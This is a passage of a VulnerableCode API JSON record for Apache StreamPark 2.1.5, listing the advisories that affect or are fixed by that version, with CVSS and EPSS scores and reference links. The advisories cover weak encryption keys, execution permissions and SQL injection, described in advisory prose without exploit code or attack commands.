{"url":"http://public2.vulnerablecode.io/api/packages/69604?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.5","type":"maven","namespace":"org.apache.streampark","name":"streampark","version":"2.1.5","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":null,"latest_non_vulnerable_version":null,"affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20407?format=json","vulnerability_id":"VCID-8bjy-8jm9-2bhu","summary":"Apache StreamPark contains an Incorrect Execution-Assigned Permissions vulnerability\nIncorrect Execution-Assigned Permissions vulnerability in Apache StreamPark. This issue affects Apache StreamPark: from 2.1.4 before 2.1.6. Users are recommended to upgrade to version 2.1.6, which fixes the issue. Version 2.1.6 has yet to be published in the Maven registry.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-30001","reference_id":"","reference_type":"","scores":[{"value":"0.00272","scoring_system":"epss","scoring_elements":"0.50834","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-30001"},{"reference_url":"https://github.com/apache/streampark","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark"},{"reference_url":"https://lists.apache.org/thread/xfmsvhkcnr1831n0w5ovy3p44lsmfb7m","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-10-10T18:58:38Z/"}],"url":"https://lists.apache.org/thread/xfmsvhkcnr18
31n0w5ovy3p44lsmfb7m"},{"reference_url":"http://www.openwall.com/lists/oss-security/2025/09/04/1","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2025/09/04/1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-30001","reference_id":"CVE-2025-30001","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-30001"},{"reference_url":"https://github.com/advisories/GHSA-6wwv-6mm3-pp76","reference_id":"GHSA-6wwv-6mm3-pp76","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6wwv-6mm3-pp76"}],"fixed_packages":[],"aliases":["CVE-2025-30001","GHSA-6wwv-6mm3-pp76"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8bjy-8jm9-2bhu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21842?format=json","vulnerability_id":"VCID-9ssf-rvpt-suce","summary":"Apache StreamPark has a hard-coded encryption key\nIn Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. 
Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access.\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54947","reference_id":"","reference_type":"","scores":[{"value":"0.00053","scoring_system":"epss","scoring_elements":"0.16836","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54947"},{"reference_url":"https://github.com/apache/streampark","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark"},{"reference_url":"https://github.com/apache/streampark/commit/39034db0c806168afa82e58e4f376e1e3c3b73e4","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark/commit/39034db0c806168afa82e58e4f376e1e3c3b73e4"},{"reference_url":"https://lists.apache.org/thread/kdntmzyzrco75x9q6mc6s8lty1fxmog1","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:
M/D:T/2025-12-12T18:48:43Z/"}],"url":"https://lists.apache.org/thread/kdntmzyzrco75x9q6mc6s8lty1fxmog1"},{"reference_url":"http://www.openwall.com/lists/oss-security/2025/12/12/3","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2025/12/12/3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54947","reference_id":"CVE-2025-54947","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54947"},{"reference_url":"https://github.com/advisories/GHSA-prv5-c2px-j9q3","reference_id":"GHSA-prv5-c2px-j9q3","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-prv5-c2px-j9q3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/71742?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.7","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.7"}],"aliases":["CVE-2025-54947","GHSA-prv5-c2px-j9q3"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9ssf-rvpt-suce"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21843?format=json","vulnerability_id":"VCID-vpe1-chyd-q7cu","summary":"Apache StreamPark uses a Weak Encryption Algorithm\nWeak Encryption Algorithm in StreamPark, The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, 
including JWT tokens, may have risked exposing sensitive authentication data\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54981","reference_id":"","reference_type":"","scores":[{"value":"0.00025","scoring_system":"epss","scoring_elements":"0.07432","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-54981"},{"reference_url":"https://github.com/apache/streampark","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark"},{"reference_url":"https://github.com/apache/streampark/commit/39034db0c806168afa82e58e4f376e1e3c3b73e4","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark/commit/39034db0c806168afa82e58e4f376e1e3c3b73e4"},{"reference_url":"https://lists.apache.org/thread/9rbvdvwg5fdhzjdgyrholgso53r26998","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-12T19:26:21Z/"}],"url":"https://lists.apache.org/thread/9rbvdvwg5fdhzjdgyrholgso53r26998"},{"reference_url":"http://www.op
enwall.com/lists/oss-security/2025/12/12/4","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2025/12/12/4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54981","reference_id":"CVE-2025-54981","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-54981"},{"reference_url":"https://github.com/advisories/GHSA-749j-2hp6-8cxm","reference_id":"GHSA-749j-2hp6-8cxm","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-749j-2hp6-8cxm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/71742?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.7","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.7"}],"aliases":["CVE-2025-54981","GHSA-749j-2hp6-8cxm"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vpe1-chyd-q7cu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/21835?format=json","vulnerability_id":"VCID-ztkm-usgz-hkdx","summary":"Apache StreamPark: Use the user’s password as the secret key Vulnerability\nWhen encrypting sensitive data, weak encryption keys that are fixed or directly generated based on user passwords are used. 
Attackers can obtain these keys through methods such as reverse engineering, code leaks, or password guessing, thereby decrypting stored or transmitted encrypted data, leading to the leakage of sensitive information.\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53960","reference_id":"","reference_type":"","scores":[{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19254","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53960"},{"reference_url":"https://github.com/apache/streampark","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark"},{"reference_url":"https://github.com/apache/streampark/commit/39034db0c806168afa82e58e4f376e1e3c3b73e4","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark/commit/39034db0c806168afa82e58e4f376e1e3c3b73e4"},{"reference_url":"https://lists.apache.org/thread/xlpvfzf5l5m5mfyjwrz5h4dssm3c32vy","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4
.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-12T18:47:19Z/"}],"url":"https://lists.apache.org/thread/xlpvfzf5l5m5mfyjwrz5h4dssm3c32vy"},{"reference_url":"http://www.openwall.com/lists/oss-security/2025/12/04/1","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2025/12/04/1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53960","reference_id":"CVE-2025-53960","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"},{"value":"8.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53960"},{"reference_url":"https://github.com/advisories/GHSA-3hg2-rh4r-8qf6","reference_id":"GHSA-3hg2-rh4r-8qf6","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-3hg2-rh4r-8qf6"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/71742?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.7","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.7"}],"aliases":["CVE-2025-53960","GHSA-3hg2-rh4r-8qf6"],"risk_score":4.0,"exploitability":"0.5","
weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ztkm-usgz-hkdx"}],"fixing_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/251646?format=json","vulnerability_id":"VCID-3fqv-y3zq-fqgd","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29178","reference_id":"","reference_type":"","scores":[{"value":"0.06649","scoring_system":"epss","scoring_elements":"0.91352","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29178"},{"reference_url":"https://github.com/apache/streampark","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark"},{"reference_url":"https://lists.apache.org/thread/n6dhnl68knpxy80t35qxkkw2691l8sfn","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-18T13:21:44Z/"}],"url":"https://lists.apache.org/thread/n6dhnl68knpxy80t35qxkkw2691l8sfn"},{"reference_url":"http://www.openwall.com/lists/oss-security/2024/07/18/1","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-18T13:21:44Z/"}],"url":"http://www.openwall.com/lists/oss-security/2024/07/18/1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29178","reference
_id":"CVE-2024-29178","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29178"},{"reference_url":"https://github.com/advisories/GHSA-vv8h-m63v-53pq","reference_id":"GHSA-vv8h-m63v-53pq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-vv8h-m63v-53pq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82188?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.4"},{"url":"http://public2.vulnerablecode.io/api/packages/69604?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8bjy-8jm9-2bhu"},{"vulnerability":"VCID-9ssf-rvpt-suce"},{"vulnerability":"VCID-vpe1-chyd-q7cu"},{"vulnerability":"VCID-ztkm-usgz-hkdx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.5"}],"aliases":["CVE-2024-29178","GHSA-vv8h-m63v-53pq"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3fqv-y3zq-fqgd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/251785?format=json","vulnerability_id":"VCID-ct4f-rfw5-gfa4","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29737","reference_id":"","reference_type":"","scores":[{"value":"0.00749","scoring_system":"epss","scoring_elements":"0.73426","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29737"},{"reference_url":"https
://github.com/apache/streampark","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark"},{"reference_url":"https://lists.apache.org/thread/xhx7jt1t24s6d7o435wxng8t0ojfbfh5","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-18T15:08:55Z/"}],"url":"https://lists.apache.org/thread/xhx7jt1t24s6d7o435wxng8t0ojfbfh5"},{"reference_url":"http://www.openwall.com/lists/oss-security/2024/07/17/2","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-18T15:08:55Z/"}],"url":"http://www.openwall.com/lists/oss-security/2024/07/17/2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29737","reference_id":"CVE-2024-29737","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29737"},{"reference_url":"https://github.com/advisories/GHSA-5v69-92vw-fmjh","referen
ce_id":"GHSA-5v69-92vw-fmjh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5v69-92vw-fmjh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82188?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.4"},{"url":"http://public2.vulnerablecode.io/api/packages/69604?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8bjy-8jm9-2bhu"},{"vulnerability":"VCID-9ssf-rvpt-suce"},{"vulnerability":"VCID-vpe1-chyd-q7cu"},{"vulnerability":"VCID-ztkm-usgz-hkdx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.5"}],"aliases":["CVE-2024-29737","GHSA-5v69-92vw-fmjh"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ct4f-rfw5-gfa4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/251596?format=json","vulnerability_id":"VCID-dm1g-1j1x-wkh9","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29120","reference_id":"","reference_type":"","scores":[{"value":"0.0008","scoring_system":"epss","scoring_elements":"0.2358","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-29120"},{"reference_url":"https://github.com/apache/incubator-streampark","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/incubator-streampark"},{"reference_url":"https://lists.a
pache.org/thread/y3oqz7l8vd7jxxx3z2khgl625nvfr60j","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-17T18:16:06Z/"}],"url":"https://lists.apache.org/thread/y3oqz7l8vd7jxxx3z2khgl625nvfr60j"},{"reference_url":"http://www.openwall.com/lists/oss-security/2024/07/17/4","reference_id":"","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-07-17T18:16:06Z/"}],"url":"http://www.openwall.com/lists/oss-security/2024/07/17/4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29120","reference_id":"CVE-2024-29120","reference_type":"","scores":[{"value":"5.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-29120"},{"reference_url":"https://github.com/advisories/GHSA-hcf8-5j78-887v","reference_id":"GHSA-hcf8-5j78-887v","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hcf8-5j78-887v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82188?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.4"},{"url":"http://public2.vulnerablecode.io/api/packages/69604?fo
rmat=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8bjy-8jm9-2bhu"},{"vulnerability":"VCID-9ssf-rvpt-suce"},{"vulnerability":"VCID-vpe1-chyd-q7cu"},{"vulnerability":"VCID-ztkm-usgz-hkdx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.5"}],"aliases":["CVE-2024-29120","GHSA-hcf8-5j78-887v"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-dm1g-1j1x-wkh9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19096?format=json","vulnerability_id":"VCID-pxce-7c8m-euce","summary":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')\nIn the StreamPark platform, when users log in to the system and use certain features, some pages provide fuzzy search by name (job names, role names, etc.). The SQL has the form: select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. 
This could potentially result in information leakage.\n\nMitigation:\n\nUsers are recommended to upgrade to version 2.1.2, which fixes the issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-30867","reference_id":"","reference_type":"","scores":[{"value":"0.00402","scoring_system":"epss","scoring_elements":"0.61106","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-30867"},{"reference_url":"https://github.com/apache/incubator-streampark","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/incubator-streampark"},{"reference_url":"https://lists.apache.org/thread/bhdzh6hnh04yyf3g203bbyvxryd720o2","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread/bhdzh6hnh04yyf3g203bbyvxryd720o2"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-30867","reference_id":"CVE-2023-30867","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_el